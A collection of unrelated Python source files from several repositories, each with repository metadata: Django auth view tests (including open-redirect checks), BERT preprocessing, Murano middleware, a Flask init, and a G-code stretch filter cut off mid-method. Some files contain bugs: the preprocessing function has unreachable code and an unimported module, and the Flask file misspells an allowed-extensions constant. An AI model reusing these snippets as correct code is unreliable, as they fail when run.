querystring = QueryDict('', mutable=True)
querystring['next'] = '/login_required/'
self.assertEqual(login_required_url,
'http://testserver%s?%s' % (login_url, querystring.urlencode('/')))
def test_remote_login_url(self):
login_url = 'http://remote.example.com/login'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url,
'%s?%s' % (login_url, querystring.urlencode('/')))
def test_https_login_url(self):
login_url = 'https:///login/'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url,
'%s?%s' % (login_url, querystring.urlencode('/')))
def test_login_url_with_querystring(self):
login_url = '/login/?pretty=1'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('pretty=1', mutable=True)
querystring['next'] = '/login_required/'
self.assertEqual(login_required_url, 'http://testserver/login/?%s' %
querystring.urlencode('/'))
def test_remote_login_url_with_next_querystring(self):
login_url = 'http://remote.example.com/login/'
login_required_url = self.get_login_required_url('%s?next=/default/' %
login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url, '%s?%s' % (login_url,
querystring.urlencode('/')))
class LogoutTest(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls'
def confirm_logged_out(self):
self.assertTrue(SESSION_KEY not in self.client.session)
def test_logout_default(self):
"Logout without next_page option renders the default template"
self.login()
response = self.client.get('/logout/')
self.assertEqual(200, response.status_code)
self.assertTrue('Logged out' in response.content)
self.confirm_logged_out()
def test_14377(self):
# Bug 14377
self.login()
response = self.client.get('/logout/')
self.assertTrue('site' in response.context)
def test_logout_with_overridden_redirect_url(self):
# Bug 11223
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
response = self.client.get('/logout/next_page/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/login/'))
self.confirm_logged_out()
def test_logout_with_next_page_specified(self):
"Logout with next_page option given redirects to specified resource"
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
self.confirm_logged_out()
def test_logout_with_redirect_argument(self):
"Logout with query string redirects to specified resource"
self.login()
response = self.client.get('/logout/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/login/'))
self.confirm_logged_out()
def test_logout_with_custom_redirect_argument(self):
"Logout with custom query string redirects to specified resource"
self.login()
response = self.client.get('/logout/custom_query/?follow=/somewhere/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
self.confirm_logged_out()
def test_security_check(self, password='password'):
logout_url = reverse('django.contrib.auth.views.logout')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'
):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urllib.quote(bad_url)
}
self.login()
response = self.client.get(nasty_url)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response['Location'],
"%s should be blocked" % bad_url)
self.confirm_logged_out()
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/url%20with%20spaces/', # see ticket #12534
):
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urllib.quote(good_url)
}
self.login()
response = self.client.get(safe_url)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response['Location'],
"%s should be allowed" % good_url)
self.confirm_logged_out()
|
MiltosD/CEFELRC
|
lib/python2.7/site-packages/django/contrib/auth/tests/views.py
|
Python
|
bsd-3-clause
| 19,815
|
################################################################################################################
#
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################################################
# Copyright 2021 Google LLC
## Perform BERT text pre-processing
## Placeholder - Empty Pre-Processing Function
def preprocessing_fn(inputs):
inputs['comment_text'] = tf.strings.lower(inputs['comment_text'])
return {
'text': inputs['comment_text'],
'label': inputs['target']
}
return outputs
|
googleforgames/clean-chat
|
components/model/bert/preprocessing.py
|
Python
|
apache-2.0
| 1,145
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2015-2018 by Exopy Authors, see AUTHORS for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""All possible contributions to plugin of the app package.
"""
from .app_extensions import AppStartup, AppClosing, AppClosed
__all__ = ['AppStartup', 'AppClosing', 'AppClosed']
|
Ecpy/ecpy
|
exopy/app/api.py
|
Python
|
bsd-3-clause
| 563
|
from __future__ import print_function
"""
Some tests for narrative exporting.
"""
__author__ = "Bill Riehl <wjriehl@lbl.gov>"
from biokbase.narrative.narrativeio import PermissionsError
from biokbase.narrative.exporter.exporter import NarrativeExporter
import os
import sys
import argparse
def main(args):
if not args.narrative_ref:
print("Must include a Narrative object reference in the format XXX/YYY (these are the numbers in the usual Narrative URL)")
return 1
if not args.outfile:
print("Must include an output file for exporting the Narrative!")
return 1
outfile = args.outfile
if not outfile.lower().endswith(".html"):
outfile = outfile + ".html"
exporter = NarrativeExporter()
try:
exporter.export_narrative(args.narrative_ref, outfile)
except PermissionsError:
print("The Narrative at reference " + args.narrative_ref + " does not appear to be public!")
return 1
except Exception as e:
print("An error occurred while exporting your Narrative:")
print(str(e))
return 1
def parse_args():
p = argparse.ArgumentParser(description="Exports a Narrative to an HTML page.")
p.add_argument("-n", "--narrative", dest="narrative_ref", help="Narrative object reference")
p.add_argument("-o", "--output_file", dest="outfile", help="Output HTML file (.html will be appended if necessary)")
return p.parse_args()
if __name__ == '__main__':
sys.exit(main(parse_args()))
|
mlhenderson/narrative
|
scripts/export_narrative.py
|
Python
|
mit
| 1,511
|
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A filter middleware that inspects the requested URI for a version string
and/or Accept headers and attempts to negotiate an API controller to
return
"""
from oslo_log import log as logging
from murano.api import versions
from murano.common.i18n import _LW
from murano.common import wsgi
LOG = logging.getLogger(__name__)
class VersionNegotiationFilter(wsgi.Middleware):
@classmethod
def factory(cls, global_conf, **local_conf):
def filter(app):
return cls(app)
return filter
def __init__(self, app):
self.versions_app = versions.Controller()
super(VersionNegotiationFilter, self).__init__(app)
def process_request(self, req):
"""Try to find a version first in the accept header, then the URL."""
LOG.debug(("Determining version of request:{method} {path} "
"Accept: {accept}").format(method=req.method,
path=req.path,
accept=req.accept))
LOG.debug("Using url versioning")
# Remove version in url so it doesn't conflict later
req_version = self._pop_path_info(req)
try:
version = self._match_version_string(req_version)
except ValueError:
LOG.warning(_LW("Unknown version. Returning version choices."))
return self.versions_app
req.environ['api.version'] = version
req.path_info = ''.join(('/v', str(version), req.path_info))
LOG.debug("Matched version: v{version}".format(version=version))
LOG.debug('new path {path}'.format(path=req.path_info))
return None
def _match_version_string(self, subject):
"""Tries to match major and/or minor version
Given a string, tries to match a major and/or
minor version number.
:param subject: The string to check
:returns version found in the subject
:raises ValueError if no acceptable version could be found
"""
if subject in ('v1',):
major_version = 1
else:
raise ValueError()
return major_version
def _pop_path_info(self, req):
"""Returns the popped off next segment
'Pops' off the next segment of PATH_INFO, returns the popped
segment. Do NOT push it onto SCRIPT_NAME.
"""
path = req.path_info
if not path:
return None
while path.startswith('/'):
path = path[1:]
idx = path.find('/')
if idx == -1:
idx = len(path)
r = path[:idx]
req.path_info = path[idx:]
return r
|
DavidPurcell/murano_temp
|
murano/api/middleware/version_negotiation.py
|
Python
|
apache-2.0
| 3,306
|
from flask import Flask, jsonify, render_template, request
from werkzeug import secure_filename
#import inception_client
UPLOAD_FORDER = 'flaskr2/upload'
ALLOWED_ENTENSIONS = set(['txt','pdf','png','jpg','jpeg','gif'])
app = Flask(__name__,static_url_path='/flaskr2/static')
app.config['UPLOAD_FORDER'] = UPLOAD_FORDER
app.config['MAX_CONTENT_LENGTH'] = 16*1024*1024
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.',1)[1] in ALLOWED_EXTENSIONS
from flaskr2 import flaskr
|
yuzhao12/MindCamera
|
flaskr2/__init__.py
|
Python
|
mit
| 512
|
import argparse
import pysam
import sys
from Bio import SeqIO
from Bio.Seq import Seq
def _gen_seqs(bam):
"""Yield SeqIO records of the reference sequence each query is aligned to."""
for read in bam:
ref_seq = read.get_reference_sequence().upper()
name = '{}_{}'.format(read.reference_name, read.query_name)
yield SeqIO.SeqRecord(id=name, seq=Seq(ref_seq))
def main():
parser = argparse.ArgumentParser(
prog='ref_seqs_from_bam',
description='Extract reference sequence that queries are aligned to',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('bam', help='input bam file, MD tag must be set (mini_align -m).')
args = parser.parse_args()
with pysam.AlignmentFile(args.bam) as bam:
SeqIO.write(_gen_seqs(bam), sys.stdout, 'fasta')
if __name__ == '__main__':
main()
|
nanoporetech/pomoxis
|
pomoxis/ref_seqs_from_bam.py
|
Python
|
mpl-2.0
| 888
|
"""
This page is in the table of contents.
Stretch is very important Skeinforge plugin that allows you to partially compensate for the fact that extruded holes are
smaller then they should be. It stretches the threads to partially compensate for filament shrinkage when extruded.
The stretch manual page is at:
http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Stretch
Extruded holes are smaller than the model because while printing an arc the head is depositing filament on both sides
of the arc but in the inside of the arc you actually need less material then on the outside of the arc. You can read
more about this on the RepRap ArcCompensation page:
http://reprap.org/bin/view/Main/ArcCompensation
In general, stretch will widen holes and push corners out. In practice the filament contraction will not be identical
to the algorithm, so even once the optimal parameters are determined, the stretch script will not be able to eliminate
the inaccuracies caused by contraction, but it should reduce them.
All the defaults assume that the thread sequence choice setting in fill is the edge being extruded first, then the
loops, then the infill. If the thread sequence choice is different, the optimal thread parameters will also be
different. In general, if the infill is extruded first, the infill would have to be stretched more so that even after
the filament shrinkage, it would still be long enough to connect to the loop or edge.
Holes should be made with the correct area for their radius. In other words, for example if your modeling program
approximates a hole of radius one (area = pi) by making a square with the points at [(1,0), (0,1), (-1,0), (0,-1)]
(area = 2), the radius should be increased by sqrt(pi/2). This can be done in fabmetheus xml by writing:
radiusAreal='True'
in the attributes of the object or any parent of that object. In other modeling programs, you'll have to this manually
or make a script. If area compensation is not done, then changing the stretch parameters to over compensate for too
small hole areas will lead to incorrect compensation in other shapes.
==Settings==
===Loop Stretch Over Perimeter Width===
Default is 0.1.
Defines the ratio of the maximum amount the loop aka inner shell threads will be stretched compared to the edge width,
in general this value should be the same as the 'Perimeter Outside Stretch Over Perimeter Width' setting.
===Path Stretch Over Perimeter Width===
Default is zero.
Defines the ratio of the maximum amount the threads which are not loops, like the infill threads, will be stretched
compared to the edge width.
===Perimeter===
====Perimeter Inside Stretch Over Perimeter Width====
Default is 0.32.
Defines the ratio of the maximum amount the inside edge thread will be stretched compared to the edge width, this is
the most important setting in stretch. The higher the value the more it will stretch the edge and the wider holes will
be. If the value is too small, the holes could be drilled out after fabrication, if the value is too high, the holes
would be too wide and the part would have to junked.
====Perimeter Outside Stretch Over Perimeter Width====
Default is 0.1.
Defines the ratio of the maximum amount the outside edge thread will be stretched compared to the edge width, in
general this value should be around a third of the 'Perimeter Inside Stretch Over Perimeter Width' setting.
===Stretch from Distance over Perimeter Width===
Default is two.
The stretch algorithm works by checking at each turning point on the extrusion path what the direction of the thread
is at a distance of 'Stretch from Distance over Perimeter Width' times the edge width, on both sides, and moves the
thread in the opposite direction. So it takes the current turning-point, goes
"Stretch from Distance over Perimeter Width" * "Perimeter Width" ahead, reads the direction at that point. Then it
goes the same distance in back in time, reads the direction at that other point. It then moves the thread in the
opposite direction, away from the center of the arc formed by these 2 points+directions.
The magnitude of the stretch increases with:
the amount that the direction of the two threads is similar and
by the '..Stretch Over Perimeter Width' ratio.
==Examples==
The following examples stretch the file Screw Holder Bottom.stl. The examples are run in a terminal in the folder
which contains Screw Holder Bottom.stl and stretch.py.
> python stretch.py
This brings up the stretch dialog.
> python stretch.py Screw Holder Bottom.stl
The stretch tool is parsing the file:
Screw Holder Bottom.stl
..
The stretch tool has created the file:
.. Screw Holder Bottom_stretch.gcode
"""
from __future__ import absolute_import
import base64
import logging
import zlib
import re
from gcodeutils.gcoder import split, Line, parse_coordinates, unsplit, linear_move_gcodes
from .vector3 import Vector3
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
try:
xrange
except NameError:
xrange = range
def get_location_from_line(old_location, line):
"""Get the location from a GCode line, carrying over existing location."""
if old_location is None:
old_location = Vector3()
return Vector3(
line.x if line.x is not None else old_location.x,
line.y if line.y is not None else old_location.y,
line.z if line.z is not None else old_location.z,
)
def dot_product(lhs, rhs):
"""Get the dot product of a pair of complexes."""
return lhs.real * rhs.real + lhs.imag * rhs.imag
class LineIteratorForwardLegacy(object):
"""Forward line iterator class."""
logger = logging.getLogger('iterator')
def __init__(self, line_index, lines):
self.first_visited_index = None
self.line_index = line_index
self.first_visited_index = None
self.lines = lines
self.increment = 1
self.stop_on_extrusion_off = True
self.logger.debug("started iterator with line_index = %d", self.line_index)
def index_setup(self):
pass
def reset_index_on_limit(self):
"""Get index just after the activate command."""
self.logger.debug("reset index forward")
for lineIndex in xrange(self.line_index - 1, 0, - 1):
if StretchFilter.EXTRUSION_ON_MARKER in self.lines[lineIndex].raw:
return lineIndex + 1
print('This should never happen in stretch, no activate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
def index_in_valid_range(self):
return 0 <= self.line_index < len(self.lines)
def get_next(self):
"""Get next line going backward or raise exception."""
self.index_setup()
while self.index_in_valid_range():
if self.line_index == self.first_visited_index:
self.logger.debug("infinite looping detected")
raise StopIteration("You've reached the end of the line.")
if self.first_visited_index is None:
self.first_visited_index = self.line_index
line = self.lines[self.line_index]
if StretchFilter.EXTRUSION_OFF_MARKER in line.raw and self.stop_on_extrusion_off:
self.line_index = self.reset_index_on_limit()
continue
self.line_index += self.increment
if line.command in linear_move_gcodes and (line.x is not None or line.y is not None):
self.logger.debug("found (%d) %s %s", self.increment, line.x, line.y)
return line
self.logger.debug("no more point in loop")
raise StopIteration("You've reached the end of the line.")
class LineIteratorBackwardLegacy(LineIteratorForwardLegacy):
"""Backward line iterator class."""
def __init__(self, line_index, lines):
super(LineIteratorBackwardLegacy, self).__init__(line_index, lines)
self.increment = -1
def index_setup(self):
if self.line_index < 1:
self.line_index = self.reset_index_on_limit()
def reset_index_on_limit(self):
"""Get index two lines before the deactivate command."""
self.logger.debug("reset index backward")
for lineIndex in xrange(self.line_index + 1, len(self.lines)):
if StretchFilter.EXTRUSION_OFF_MARKER in self.lines[lineIndex].raw:
return lineIndex - 2
print('This should never happen in stretch, no deactivate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class LineIteratorForward(LineIteratorForwardLegacy):
def reset_index_on_limit(self):
"""Get index just after the activate command."""
self.logger.debug("reset index forward (modern)")
for lineIndex in xrange(self.line_index - 1, -1, - 1):
if StretchFilter.LOOP_START_MARKER in self.lines[lineIndex].raw:
return lineIndex + 1
print('This should never happen in stretch, no activate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class CuraLineIteratorForward(LineIteratorForwardLegacy):
def __init__(self, line_index, lines):
super(CuraLineIteratorForward, self).__init__(line_index, lines)
self.stop_on_extrusion_off = False
def index_setup(self):
if StretchFilter.LOOP_STOP_MARKER in self.lines[self.line_index].raw:
self.line_index = self.reset_index_on_limit()
def reset_index_on_limit(self):
"""Get index just after the activate command."""
self.logger.debug("reset index forward (modern)")
for lineIndex in xrange(self.line_index - 1, -1, - 1):
if StretchFilter.LOOP_START_MARKER in self.lines[lineIndex].raw:
return lineIndex
print('This should never happen in stretch, no activate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class LineIteratorBackward(LineIteratorBackwardLegacy):
def index_setup(self):
if self.line_index < 0:
self.line_index = self.reset_index_on_limit()
elif StretchFilter.LOOP_START_MARKER in self.lines[self.line_index + 1].raw: # if just before a loop start
self.line_index = self.reset_index_on_limit()
def reset_index_on_limit(self):
"""Get index two lines before the deactivate command."""
self.logger.debug("reset index backward (modern)")
for lineIndex in xrange(self.line_index + 1, len(self.lines)):
if StretchFilter.EXTRUSION_OFF_MARKER in self.lines[lineIndex].raw:
return lineIndex - 2
print('This should never happen in stretch, no deactivate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class CuraLineIteratorBackward(LineIteratorBackwardLegacy):
def __init__(self, line_index, lines):
super(CuraLineIteratorBackward, self).__init__(line_index, lines)
self.stop_on_extrusion_off = False
def index_setup(self):
if self.line_index < 0:
self.line_index = self.reset_index_on_limit()
elif StretchFilter.LOOP_START_MARKER in self.lines[self.line_index + 1].raw: # if just before a loop start
self.line_index = self.reset_index_on_limit()
def reset_index_on_limit(self):
"""Get index two lines before the deactivate command."""
self.logger.debug("reset index backward (modern)")
for lineIndex in xrange(self.line_index + 1, len(self.lines)):
if StretchFilter.LOOP_STOP_MARKER in self.lines[lineIndex].raw:
return lineIndex - 1
print('This should never happen in stretch, no deactivate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class StretchRepository:
"""A class to handle the stretch settings."""
def __init__(self, cross_limit_distance_over_edge_width=5.0, loop_stretch_over_edge_width=0.11,
edge_inside_stretch_over_edge_width=0.32, edge_outside_stretch_over_edge_width=0.1,
stretch_from_distance_over_edge_width=2.0, stretch_strength=1.0, **kwargs):
"""Set the default settings."""
# Cross Limit Distance Over Perimeter Width (ratio)
self.crossLimitDistanceOverEdgeWidth = cross_limit_distance_over_edge_width
self.loopStretchOverEdgeWidth = loop_stretch_over_edge_width * stretch_strength
self.edgeInsideStretchOverEdgeWidth = edge_inside_stretch_over_edge_width * stretch_strength
self.edgeOutsideStretchOverEdgeWidth = edge_outside_stretch_over_edge_width * stretch_strength
# Stretch From Distance Over Perimeter Width (ratio)
self.stretchFromDistanceOverEdgeWidth = stretch_from_distance_over_edge_width
class StretchFilter:
"""A class to stretch a skein of extrusions."""
EXTRUSION_ON_MARKER = 'stretch-extrusion-on'
EXTRUSION_OFF_MARKER = 'stretch-extrusion-off'
LOOP_START_MARKER = 'stretch-loop-start'
INNER_EDGE_START_MARKER = LOOP_START_MARKER + ' stretch-inner-edge-start'
OUTER_EDGE_START_MARKER = LOOP_START_MARKER + ' stretch-outer-edge-start'
LOOP_STOP_MARKER = 'stretch-loop-stop'
def __init__(self, **kwargs):
self.edgeWidth = 0.4
self.extruderActive = False
self.feedRateMinute = 959.0
self.isLoop = False
self.oldLocation = None
self.gcode = None
self.current_layer = None
self.line_number_in_layer = 0
self.stretchRepository = StretchRepository(**kwargs)
self.thread_maximum_absolute_stretch = 0
self.line_forward_iterator = LineIteratorForwardLegacy
self.line_backward_iterator = LineIteratorBackwardLegacy
def filter(self, gcode):
"""Parse gcode text and store the stretch gcode."""
self.gcode = gcode
self.setup_filter()
for self.current_layer_index, current_layer in enumerate(self.gcode.all_layers):
self.current_layer = current_layer[:]
for self.line_number_in_layer, line in enumerate(self.current_layer):
gcode_line = self.parse_line(line)
parse_coordinates(gcode_line, split(gcode_line))
self.gcode.all_layers[self.current_layer_index][self.line_number_in_layer] = gcode_line
def get_cross_limited_stretch(self, crossLimitedStretch, crossLineIterator, locationComplex):
"""Get cross limited relative stretch for a location."""
try:
line = crossLineIterator.get_next()
except StopIteration:
return crossLimitedStretch
pointComplex = get_location_from_line(self.oldLocation, line).dropAxis()
pointMinusLocation = locationComplex - pointComplex
pointMinusLocationLength = abs(pointMinusLocation)
if pointMinusLocationLength <= self.crossLimitDistanceFraction:
return crossLimitedStretch
parallelNormal = pointMinusLocation / pointMinusLocationLength
parallelStretch = dot_product(parallelNormal, crossLimitedStretch) * parallelNormal
if pointMinusLocationLength > self.crossLimitDistance:
return parallelStretch
crossNormal = complex(parallelNormal.imag, - parallelNormal.real)
crossStretch = dot_product(crossNormal, crossLimitedStretch) * crossNormal
crossPortion = (self.crossLimitDistance - pointMinusLocationLength) / self.crossLimitDistanceRemainder
return parallelStretch + crossStretch * crossPortion
def get_relative_stretch(self, locationComplex, lineIterator):
"""Get relative stretch for a location."""
lastLocationComplex = locationComplex
oldTotalLength = 0.0
pointComplex = locationComplex
totalLength = 0.0
while 1:
try:
line = lineIterator.get_next()
except StopIteration:
locationMinusPoint = locationComplex - pointComplex
locationMinusPointLength = abs(locationMinusPoint)
if locationMinusPointLength > 0.0:
return locationMinusPoint / locationMinusPointLength
return complex()
pointComplex = get_location_from_line(self.oldLocation, line).dropAxis()
locationMinusPoint = lastLocationComplex - pointComplex
locationMinusPointLength = abs(locationMinusPoint)
totalLength += locationMinusPointLength
logging.debug("total length: %d, stretchFromDistance: %f", totalLength, self.stretchFromDistance)
if totalLength >= self.stretchFromDistance:
distanceFromRatio = (self.stretchFromDistance - oldTotalLength) / locationMinusPointLength
totalPoint = distanceFromRatio * pointComplex + (1.0 - distanceFromRatio) * lastLocationComplex
locationMinusTotalPoint = locationComplex - totalPoint
return locationMinusTotalPoint / self.stretchFromDistance
lastLocationComplex = pointComplex
oldTotalLength = totalLength
def stretch_line(self, line):
"""Get stretched gcode line."""
location = get_location_from_line(self.oldLocation, line)
self.feedRateMinute = line.f or self.feedRateMinute
self.oldLocation = location
# if thread_maximum_absolute_stretch is set (ie within a loop) and we're extruding or after to do so,
# adjust the point location to account for stretching
if self.thread_maximum_absolute_stretch > 0.0:
return self.get_stretched_line_from_index_location(self.line_number_in_layer - 1,
self.line_number_in_layer + 1,
location,
line)
return line
def get_stretched_line_from_index_location(self, indexPreviousStart, indexNextStart, location, original_line):
"""Get stretched gcode line from line index and location."""
crossIteratorForward = self.line_forward_iterator(indexNextStart, self.current_layer)
crossIteratorBackward = self.line_backward_iterator(indexPreviousStart, self.current_layer)
iteratorForward = self.line_forward_iterator(indexNextStart, self.current_layer)
iteratorBackward = self.line_backward_iterator(indexPreviousStart, self.current_layer)
locationComplex = location.dropAxis()
logging.debug("original point to stretch: %s", locationComplex)
relativeStretch = self.get_relative_stretch(locationComplex, iteratorForward) \
+ self.get_relative_stretch(locationComplex, iteratorBackward)
relativeStretch *= 0.8
relativeStretch = self.get_cross_limited_stretch(relativeStretch, crossIteratorForward, locationComplex)
relativeStretch = self.get_cross_limited_stretch(relativeStretch, crossIteratorBackward, locationComplex)
relativeStretchLength = abs(relativeStretch)
if relativeStretchLength > 1.0:
relativeStretch /= relativeStretchLength
logging.debug("relativeStretchLength: %f", relativeStretchLength)
absoluteStretch = relativeStretch * self.thread_maximum_absolute_stretch
stretchedPoint = location.dropAxis() + absoluteStretch
result = Line()
result.command = original_line.command
result.x = stretchedPoint.real
result.y = stretchedPoint.imag
result.z = original_line.z
result.f = self.feedRateMinute
# TODO improve new extrusion length computation. It's clearly a very rough estimate
if original_line.e is not None:
result.e = original_line.e * (1 - abs(absoluteStretch))
unsplit(result)
logging.debug("stretched point: %f %f", result.x, result.y)
return result
def is_just_before_extrusion(self):
"""Determine if activate command is before linear move command."""
for line in self.current_layer[self.line_number_in_layer + 1:]:
if line.command in linear_move_gcodes or self.EXTRUSION_OFF_MARKER in line.raw:
return False
if self.EXTRUSION_ON_MARKER in line.raw:
return True
return False
def set_edge_width(self, edge_width):
# In the original code, the edge width found in the GCode was only used to recompute the
# stretchFromDistance.
# It does seem like either a typo or a hack around a problem I've yet to bump into.
# For now, I'll apply the edge width to recompute all distance related variables
self.edgeWidth = edge_width
self.crossLimitDistance = self.edgeWidth * self.stretchRepository.crossLimitDistanceOverEdgeWidth
self.loopMaximumAbsoluteStretch = self.edgeWidth * self.stretchRepository.loopStretchOverEdgeWidth
self.edgeInsideAbsoluteStretch = self.edgeWidth * self.stretchRepository.edgeInsideStretchOverEdgeWidth
self.edgeOutsideAbsoluteStretch = self.edgeWidth * self.stretchRepository.edgeOutsideStretchOverEdgeWidth
self.stretchFromDistance = self.stretchRepository.stretchFromDistanceOverEdgeWidth * self.edgeWidth
self.thread_maximum_absolute_stretch = 0
self.crossLimitDistanceFraction = self.crossLimitDistance / 3
self.crossLimitDistanceRemainder = self.crossLimitDistance - self.crossLimitDistanceFraction
def parse_line(self, line):
"""Parse a gcode line and add it to the stretch skein."""
# check for loop markers
if self.is_inner_edge_begin(line):
self.isLoop = True
self.thread_maximum_absolute_stretch = self.edgeInsideAbsoluteStretch
elif self.is_outer_edge_begin(line):
self.isLoop = True
self.thread_maximum_absolute_stretch = self.edgeOutsideAbsoluteStretch
elif self.is_loop_begin(line):
self.isLoop = True
self.thread_maximum_absolute_stretch = self.loopMaximumAbsoluteStretch
elif self.is_loop_end(line):
self.isLoop = False
self.set_stretch_to_path()
# handle move command if in loop
if line.command in linear_move_gcodes and self.isLoop and (line.x is not None or line.y is not None):
return self.stretch_line(line)
return line
def set_stretch_to_path(self):
"""Set the thread stretch to path stretch and is loop false."""
self.isLoop = False
self.thread_maximum_absolute_stretch = 0
def is_loop_begin(self, line):
return self.LOOP_START_MARKER in line.raw
def is_loop_end(self, line):
return self.LOOP_STOP_MARKER in line.raw
def is_inner_edge_begin(self, line):
return self.INNER_EDGE_START_MARKER in line.raw
def is_outer_edge_begin(self, line):
return self.OUTER_EDGE_START_MARKER in line.raw
def setup_filter(self):
raise NotImplementedError
class Slic3rStretchFilter(StretchFilter):
UNKNOWN = 0
EXTERNAL_PERIMETER = 1
EXTRA_PERIMETER = 2
EDGE_WIDTH_REGEXP = re.compile(r'; external perimeters extrusion width\s+=\s+([\.\d]+)mm')
def __init__(self, **kwargs):
StretchFilter.__init__(self, **kwargs)
self.line_forward_iterator = LineIteratorForward
self.line_backward_iterator = LineIteratorBackward
self.next_external_perimeter_is_outer = None
self.current_type_line = None
def new_perimeter(self, line, external=False):
if external:
if self.next_external_perimeter_is_outer:
logging.debug("found external perimeter outer")
line.raw += " ; " + StretchFilter.OUTER_EDGE_START_MARKER
self.next_external_perimeter_is_outer = False
else:
logging.debug("found external perimeter inner")
line.raw += " ; " + StretchFilter.INNER_EDGE_START_MARKER
if self.current_type_line != self.EXTERNAL_PERIMETER:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.EXTERNAL_PERIMETER
else:
logging.debug("found extra perimeter")
line.raw += " ; " + StretchFilter.LOOP_START_MARKER
if self.EXTERNAL_PERIMETER == self.current_type_line:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.EXTRA_PERIMETER
def setup_filter(self):
edge_width_found = False
extruding = False
for self.current_layer in self.gcode.all_layers:
self.next_external_perimeter_is_outer = True
self.current_type_line = self.UNKNOWN
for line_idx, line in enumerate(self.current_layer):
# checking extrusion
if not extruding and line.command in linear_move_gcodes and line.e is not None:
extruding = True
line.raw += " ; " + StretchFilter.EXTRUSION_ON_MARKER
elif extruding and line.command in linear_move_gcodes and line.e is None and self.current_type_line in (
self.EXTRA_PERIMETER, self.EXTERNAL_PERIMETER):
extruding = False
line.raw += " ; " + StretchFilter.EXTRUSION_OFF_MARKER
# checking perimeter type
if '; perimeter external' in line.raw:
if self.EXTERNAL_PERIMETER != self.current_type_line:
self.new_perimeter(line, True)
elif '; perimeter' in line.raw:
if self.EXTRA_PERIMETER != self.current_type_line:
self.new_perimeter(line)
elif '; move to first perimeter point' in line.raw:
# search if next perimeter is external or not
for loop_ahead_idx in xrange(line_idx + 1, len(self.current_layer)):
if '; perimeter external' in self.current_layer[loop_ahead_idx].raw:
self.new_perimeter(line, True)
break
elif '; perimeter' in self.current_layer[loop_ahead_idx].raw:
self.new_perimeter(line)
break
elif 'unretract' not in line.raw:
if self.current_type_line in (self.EXTRA_PERIMETER, self.EXTERNAL_PERIMETER):
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.UNKNOWN
# checking for edge width
match = self.EDGE_WIDTH_REGEXP.match(line.raw)
if match:
edge_width_found = True
self.set_edge_width(float(match.group(1)))
if self.current_type_line != self.UNKNOWN:
logging.warn("unfinished loop")
if not edge_width_found:
logging.warn("no edge width found in comments, picking a default value")
self.set_edge_width(0.4)
class CuraStretchFilter(StretchFilter):
UNKNOWN = 0
EXTERNAL_PERIMETER = 1
EXTRA_PERIMETER = 2
CURA_PROFILE_REGEXP = re.compile(r';CURA_PROFILE_STRING:(.*)$')
def __init__(self, **kwargs):
StretchFilter.__init__(self, **kwargs)
self.line_forward_iterator = CuraLineIteratorForward
self.line_backward_iterator = CuraLineIteratorBackward
def new_perimeter(self, line, external=False, outer=False):
if external:
if outer:
logging.debug("found external perimeter outer")
